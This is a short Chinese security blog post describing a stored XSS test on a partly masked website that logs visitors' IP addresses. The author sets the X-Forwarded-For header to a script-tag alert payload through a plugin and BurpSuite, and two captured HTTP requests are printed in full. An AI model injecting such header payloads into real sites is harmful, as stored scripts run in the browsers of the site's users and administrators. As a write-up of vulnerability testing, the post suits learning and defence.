实战记录玩X-Forwarded-For头存储XSS

首先是一个这个网站:
 
https://io.xxx.cn/iper/ips.html
 
蓝域白帽网
 
只要你访问了这个URL:
https://io.xxx.cn/iper/
 
蓝域白帽网
 
然后就会记录你的IP:
 
蓝域白帽网
 
那么如果吧IP修改为XssPayload会不会触发XSS跨站脚本攻击呢?
 
先是下载了这个修改IP的插件:X-Forwarded-For Header
 
需要科学上网才能使用哦!
 
蓝域白帽网
 
我显示吧IP修改为内网IP然后通过BurpSuite抓包:
 
蓝域白帽网
 
GET /iper/ HTTP/1.1
Host: io.xxx.cn
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Forwarded-For: 192.168.1.2
Accept-Language: zh-CN,zh;q=0.9
 
吧X-Forwarded-For: 192.168.1.2修改为:X-Forwarded-For: "/><script>alert('Power_liu')</script>script>:
 
蓝域白帽网
 
GET /iper/ HTTP/1.1
Host: io.xxx.cn
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Forwarded-For: "/><script>alert('Power_liu')</script>script>
Accept-Language: zh-CN,zh;q=0.9
 
蓝域白帽网
 
这样就成功触发了XSS-Payload弹窗!然后我就没有继续在下去,仅仅是测试安全!

以上就是蓝域白帽黑客网为您分享的一次 玩xss payload过程 如果您喜欢 记得+关注!

本文链接:http://www.yemogege.cn/wzaq-stwz/387.html
 

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/387.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图